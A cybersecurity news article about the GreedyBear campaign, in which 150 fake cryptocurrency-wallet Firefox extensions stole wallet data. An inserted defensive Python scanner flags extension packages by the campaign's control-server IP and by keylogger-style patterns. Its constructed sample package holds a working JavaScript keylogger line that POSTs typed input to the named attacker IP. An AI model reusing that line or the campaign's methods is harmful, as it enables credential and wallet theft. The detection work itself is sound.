Red Hot Cyber


150 Malicious Firefox Extensions Stole $1 Million in Cryptocurrency

Redazione RHC : 10 August 2025 10:19

Koi Security analysts have discovered the GreedyBear malware campaign active in the Mozilla add-on store. 150 malicious Firefox extensions stole over $1 million worth of cryptocurrency from users. The fraudulent add-ons were posing as extensions for popular cryptocurrency wallets from well-known platforms, including MetaMask, TronLink, Exodus, and Rabby Wallet. Initially, they were uploaded to the store without malicious code to pass the checks and left dormant for a while, accumulating fake positive reviews.

The extension has not yet become malicious.

In a later stage of the attack, the extension’s publishers removed the original branding and replaced it with new names and logos, and also embedded malware into the code designed to steal users’ wallet data and IP addresses (likely for tracking or targeting purposes). The malicious code acted as a keylogger, intercepting data entered into form fields and pop-up windows and sending it to the attackers’ server.

Koi Security specialists informed Mozilla developers of their findings, and the malicious extensions were removed from the Firefox add-ons store. However, in addition to Firefox extensions, the operation also involves dozens of pirated software sites helping distribute 500 different malware executables, as well as a network of sites impersonating official Trezor and Jupiter Wallet resources and fake hardware wallet repair services, researchers report.

Fake Jupiter Wallet Website

All of these sites are connected to a single IP address (185.208.156[.]66), which serves as the control server for GreedyBear. In these cases, various Trojans, infostealers (such as Lumma), or even ransomware can be used as malicious payloads. The report also states that analysis of the campaign revealed clear artifacts indicating that the attackers were using artificial intelligence.

“This allows attackers to scale their operations, diversify payloads, and evade detection more quickly and easily than ever before,” the experts write. The company also warned that GreedyBear’s operators are clearly considering distributing the malware via the Chrome Web Store as well. Researchers found a malicious Chrome extension called Filecoin Wallet that used the same data-stealing logic and was linked to the aforementioned IP address.
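The two indicators the report gives (a keylogger that captures form input and ships it to a remote server, and a single control-server IP shared across the extensions and the Chrome add-on) are enough for a simple triage check of an extension package. The script below is an added example, not Koi Security's or Mozilla's tooling: it treats a Firefox .xpi (which is a zip archive) as input, flags any script referencing the IP named above, and flags scripts that both listen for typed input and make an outbound request. The two sample packages are constructed in memory for the demonstration and are not real GreedyBear artifacts.

```python
"""Triage scan of browser extension packages (.xpi/.crx are zip archives) for
the GreedyBear control-server IP and for keylogger-style behaviour.
Added example for defenders; the sample packages below are constructed."""
import io
import re
import zipfile

# Indicator from the report (written defanged in the article as 185.208.156[.]66).
C2_IP = "185.208.156.66"

# Patterns a reviewer would treat as suspicious in combination: the script
# listens for typed input AND has a way to send data to a remote host.
INPUT_CAPTURE = re.compile(
    r"addEventListener\(\s*['\"](?:input|keydown|keyup|keypress)['\"]"
)
OUTBOUND_SEND = re.compile(r"\b(?:fetch|XMLHttpRequest|navigator\.sendBeacon)\b")
C2_REF = re.compile(re.escape(C2_IP))


def scan_extension(package: bytes) -> dict:
    """Return findings for one extension package given as zip bytes.

    c2_files  - files that reference the known control-server IP
    keylogger - scripts that both capture input events and send data out
    """
    findings = {"c2_files": [], "keylogger": []}
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            if not name.endswith((".js", ".json", ".html")):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            if C2_REF.search(text):
                findings["c2_files"].append(name)
            if INPUT_CAPTURE.search(text) and OUTBOUND_SEND.search(text):
                findings["keylogger"].append(name)
    return findings


def verdict(findings: dict) -> str:
    """Collapse findings into a triage label for the reviewer queue."""
    if findings["c2_files"]:
        return "malicious"   # hard indicator: known C2 address present
    if findings["keylogger"]:
        return "suspicious"  # behavioural indicator: needs manual review
    return "clean"


def build_package(files: dict) -> bytes:
    """Build an in-memory zip from {path: content}; used only to construct fixtures."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for path, content in files.items():
            zf.writestr(path, content)
    return buf.getvalue()


# Constructed sample packages (assumed names; not real GreedyBear artifacts).
MALICIOUS_XPI = build_package({
    "manifest.json": '{"name": "Wallet Helper", "manifest_version": 2}',
    "content.js": (
        "document.addEventListener('input', e => {"
        " fetch('http://185.208.156.66/c', {method: 'POST', body: e.target.value}); });"
    ),
})
BENIGN_XPI = build_package({
    "manifest.json": '{"name": "Dark Theme", "manifest_version": 2}',
    "theme.js": "document.body.classList.add('dark');",
})

if __name__ == "__main__":
    for label, pkg in (("constructed malicious", MALICIOUS_XPI),
                       ("constructed benign", BENIGN_XPI)):
        f = scan_extension(pkg)
        print(label, "->", verdict(f), f)
```

To run this against a real profile, pass the bytes of each file under the profile's `extensions/` directory to `scan_extension`. The behavioural pattern is deliberately coarse (legitimate autofill extensions also watch input events and use `fetch`), which is why it yields "suspicious" rather than "malicious"; only the known C2 reference is treated as conclusive.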

It’s important to note that in June 2025, Mozilla developers introduced a new system for the early detection of add-ons related to cryptocurrency fraud. The system creates risk profiles for each wallet extension in the store and automatically warns of risks when a specified threshold is reached.

These warnings should encourage people reviewing add-ons to more closely examine specific extensions to remove malware from the store before it is used to empty users’ wallets.

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.
